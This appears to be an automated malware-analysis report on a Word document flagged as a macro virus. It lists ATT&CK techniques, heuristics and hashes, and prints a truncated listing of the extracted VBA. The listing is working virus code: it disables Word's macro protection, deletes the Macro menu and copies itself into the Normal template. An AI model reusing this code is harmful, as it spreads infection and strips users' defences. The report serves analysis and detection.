Verdict: MALICIOUS
Risk Score: 240

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is designed to disable macro virus protection and remove the 'Macro' option from the Tools menu. This action aims to prevent the user from being alerted to or disabling malicious macros, thereby facilitating further execution. The embedded Office document and OLE slack anomalies suggest a packed or obfuscated payload.
Heuristics (6)

- ClamAV: Doc.Trojan.Marker-35 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Marker-35
- Embedded Office document has suspicious static findings (critical, EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE): A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
- OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY): OLE file is 28,953 bytes but its declared streams total only 0 bytes; 28,953 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CFB header with no readable streams (medium, OLE_PARSE_EMPTY_STREAMS): The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous; it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43339 bytes | 522c9d9899d655cbfea6a216ff721fa024203e9ac642998f2f527060ad3974eb |
| embedded_office_off0000b2e7.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0xB2E7 | 28953 bytes | 65abc523d111bee451736b35d9899ba6af8003754342e72eb2f54a1b9ec7fc7d |

Preview of macros.bas (first 1,000 lines of the extracted script; the listing is truncated in this report):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Son, Be a Good Boy !
Const Marker = "<- this is a marker! by fs080298"
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = 1 Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = 0
CommandBars("Tools").Controls("Macro").Delete
Else
CommandBars("Tools").Controls("Macro").Delete
End If
Options.VirusProtection = False
If Month(Now) = 1 And Day(Now) < 10 Then Message$ = "HAPPY NEW YEAR " & Year(Now) & " ! From : «(¤¿¤)» Me !"
If Day(Now) = ((64 / 8) - 2 + 10 - (6 + 2)) And Month(Now) = ((30 / 6) + (4 / 2) + 4 - 5) Then Message$ = "Today Is My Birthday ! Thank's For Your Greeting..."
If Day(Now) = ((25 / 5) - 2 + 10 + 14) And Month(Now) = (2 ^ 5) - 30 + 5 Then Message$ = "Happy Birthday Honey, I Love U So Much..."
If Day(Now) = (3 ^ 6) - 700 + (2 ^ 3) - 22 And Month(Now) = (5 ^ 3) - 120 + 7 Then Message$ = "Happy Birthday, Son ! Be a Good Boy..."
If Message$ <> "" Then MsgBox Message$, vbInformation, "From : <(¤¿¤)>"
Message$ = ""
Document_Close
End Sub
Private Sub Document_Close()
Dim nmod As Object
Dim isd As String
Dim DS, NTS, DI, NTI As Boolean
Dim EmailMe, Users, LogData, LogFile As String
On Error Resume Next
If Right(Marker, 8) <> Chr(102) + Chr(115) + Chr(48) + Chr(56) + Chr(48) + Chr(50) + Chr(57) + Chr(56) Then GoTo Finish
AddIns.Unload True
Application.UserName = "fs080298"
Application.UserInitials = "FS2000"
Application.UserAddress = "fs080298@yeayea.com"
Application.EnableCancelKey = wdCancelDisabled
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "" And Mid(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(121, 1), 33, 8) <> Chr$(70) + Chr$(83) + Chr$(48) + Chr$(56) + Chr$(48) + Chr$(50) + Chr$(57) + Chr$(56) Then GoTo Finish
GoSub Sisipin
If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", _
"LogData in") = False) Then GoSub LoggingIn
GoSub EmailMePlease
GoTo Finish
Sisipin:
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "" And NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> Chr(32) + Chr$(39) + Chr$(83) + Chr$(111) + Chr$(110) + Chr$(44) + Chr$(32) + Chr$(66) + Chr$(101) + Chr$(32) + Chr$(97) + Chr$(32) + Chr$(71) + Chr$(111) + Chr$(111) + Chr$(100) + Chr$(32) + Chr$(66) + Chr$(111) + Chr$(121) + Chr$(32) + Chr$(33) Then Return
DI = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NTI = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "" And Mid(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(95, 1), 119, 20) <> Chr$(32) + Chr$(169) + Chr$(32) + Chr$(72) + Chr$(97) + Chr$(118) + Chr$(101) + Chr$(32) + Chr$(97) + Chr$(32) + Chr$(78) + Chr$(105) + Chr$(99) + Chr$(101) + Chr$(32) + Chr$(68) + Chr$(97) + Chr$(121) + Chr$(32) + Chr$(33) Then Return
If (DI Xor NTI) And (ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate) Then
If DI Then
NTS = NormalTemplate.Saved
EmailMe = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
For i = 1 To Len(Application.UserAddress)
If (Mid(Application.UserAddress, i, 1) <> Chr(13)) Then
If (Mid(Application.UserAddress
... (truncated)
```